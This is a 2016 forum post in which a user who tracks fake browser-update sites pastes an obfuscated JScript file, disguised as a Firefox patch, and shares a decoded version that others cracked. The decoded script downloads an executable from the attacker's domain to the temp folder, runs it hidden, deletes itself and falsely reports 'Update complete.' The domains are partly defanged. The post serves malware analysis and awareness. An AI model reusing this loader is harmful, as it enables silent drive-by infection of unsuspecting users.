Print Page - Can somebody decypher this?

There are a lot of fake browser update sites. Usually I download the scrypt and go to the url and forward the malicious stuff to virustotal to see how long various antivirus sites take to detect it. This scrypt though is written in gibberish that doesn't seem to have a url.

All the ZZZZZs are added to break links

It came from https://feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
to which I was maliciously redirected from
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
or
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink

The script is as follows, can you decypher it? Warning it has something malicious that no antivirus detects yet.

The symbol [ is replaced by ZZZZZ

var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m<y=krity{vyt+j)zpvoz.der{gccEfGk"iTenl(brmun mlq"i,slnahfdsa,t c.kcb;asfev)knf(qdkujeinrbl;n)brulsln}v;fkacievai(ahicqedajtjcgSuWkrg)a{fSr.ftwlbippe5t(aps0uevek}i;q)p}i0z0lprOz.ueh ddd.qdj xTbnq;x=g hed cyjps.hdc tWz1x;o(keftfcaroieplsfeeof.nRhojBeerdgnfshde m;p.iyp)ztaiwsciuPwoa;j0h=g oohnubt(s a.xiyfoeeehlsxwFnix(dsstjftiasz)sebmv)vnwaslvefDzebbu.glwinFz';var xkvof='ewtkexmkapneed(lfs.adp lSk)i;mojTbenFfaxvkfy(sepnxiulj;e)rew eanmhnbuyrw(gab.i.zdcmxel"ncgcx/x i lxdegrvtbSzil"z+trufe.kornigyrzakhxCvmrCz3e(reb4cocdpajnafmms)l+qrythSrixet+rrrfo.vocnfgeraaehoCymaCf3x(fex4zohdafo,r0aab)j,m;r)heu jlesnpa vrb wvxahcaSyWlro=x mSu.utscsiupzFstipqusrkiamfacNhezlllm mfmii(o;j flvijFeehby.btustiwsmElxqbm)d)z.d(wpjtdeblmekDbey(xeolkpfFcitSlWx dcp)f;b.rtzpuEorlif"e(xojUecahfeoteah appdilypmmwejcroy)d"c.w;gtsebci k}aac y mei(dhk)rthcl w v p e{v}e\'m;uvraird ';var ujak='iyhfgwlyeknpemflvtoig=y"n4t5g2q1d0y3y"o;vvtadrz poizlkklzrujosiub=vyufgwiyyklpemnlstcia.lliernpggtphd;cvjahrb zsqsmpjnpcgfxnyai=svsfojapqzaxfmeet.hleefnqgvtuhx/koyzzktlfrajtsvun;cvlaurz jccwsmcxrttlthsiyxxsm=fZZZZZb]r,wlxrmitgicktsxcmp=tZZZZZv]l;gvxawra xag=d0p;ifvoirc(nvhazrz mia=r0j;yid<csgsnpunicdfondap;uia+m+u)x{s x n bcswwmdxgtdlchgiqxdsxZZZZZzic]b=bvifpjwpqztxkmtei.fsuuubzsstnrx(fao,qoczskxlfrvjdswuz)b;v b d xaj s+u=aomzfktlurkjospuk;g}cfiomrr(yvoajrw uie=a0r;dib<msfsfpknocxfenoaj;jii+e';var fjaur='+t)w{t e d wfmoqrn(kvfawrh amb=h0r;fmi<dokznkolzrljssouv;cmw+z+w)t{t a x p m nacqxbsvzweesobulqj=gyufnwryikbprmtlutfip.wcchpasrvAjts(tmy)f;g b c z b hlsrcisgccjtmxpmaZZZZZvmr]r=pclwxmexitzlthaivxcstZZZZZoib]y.vcchbaurdAitn(gabqpbpvoweeqojuwqi)y;h f c p}f w q bczwkmqxatillhdikxgshZZZZZsit]o=uljrdiigocttrxkmb.pjsohirni(m"o"y)n;n}ivdaorr posabuwlaquiqnowpvznr=xcnwlmoxytmldhqiuxvsy.gjkoxiunx(f"y"m)x;oveazrk fkujaatkjcalkrglojw=u"meivyaclc"u;atjheiyseZZZZZckdjcapkbcrltralbjz]v(cosaeudldqlirnzwgvdni)e;';var gce='f';var bboahfkbss=ggudez+tcvj+xkvof+ujak+fjaur+gce; var e=new Error(2); var t=e.number; var uakenars=""; var riqrliooj=t; var vdsyeadob=bboahfkbss.split(""); for (a=0;a<vdsyeadob.length;a +=riqrliooj){ uakenars=uakenars+vdsyeadobZZZZZa];} var ycchmhvn=ZZZZZ"e","e","a","x","v","l","o"]; var xmodlrck=3-t; var vhiwyzhho=ycchmhvnZZZZZxmodlrck]+ycchmhvnZZZZZ4]+ycchmhvnZZZZZ2]+ycchmhvnZZZZZ5]; var kbubebolwc=this; var jksgjsorh=kbubebolwcZZZZZvhiwyzhho]; jksgjsorh(uakenars); var axvqsxsjewcbr='qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj';

Right now it scores 0/54 on virustotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/

In a few days it will score 5 or 10 / 54

In a week or two 20 or 30 / 54

In case anybody is interested, I posted it on another site and somebody cracked it.

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/

The decyphered script, with XXXXX added from the above gibberish is

Quote

try {
   a = new ActiveXObject("Wscript.Shell");
   b = new ActiveXObject("Scripting.FileSystemObject");
   c = new ActiveXObject("MSXML2.XMLHTTP");
   d = new ActiveXObject("ADODB.Stream");
   url = "https:/XXXXX/feipinofa .netXXXXX/10/524.dat";
   fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
   for (var i = 1; i <= 5; i++) {
   try {
   c.open("GET", url, false);
   c.send(null);
   break;
   } catch (e) {
   WScript.Sleep(5000);
   }
   }
   d.Open;
   d.Type = 1;
   d.Write(c.ResponseBody);
   d.Position = 0;
   if (b.Fileexists(fname)) b.DeleteFile(fname);
   d.SaveToFile(fname);
   a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
   var p = WScript.ScriptFullName;
   if (b.FileExists(p)) b.DeleteFile(p);
   WScript.Echo("Update complete.");
} catch (e) {}

Bitcoin Forum

Other => Off-topic => Topic started by: no-ice-please on August 10, 2016, 02:52:54 AM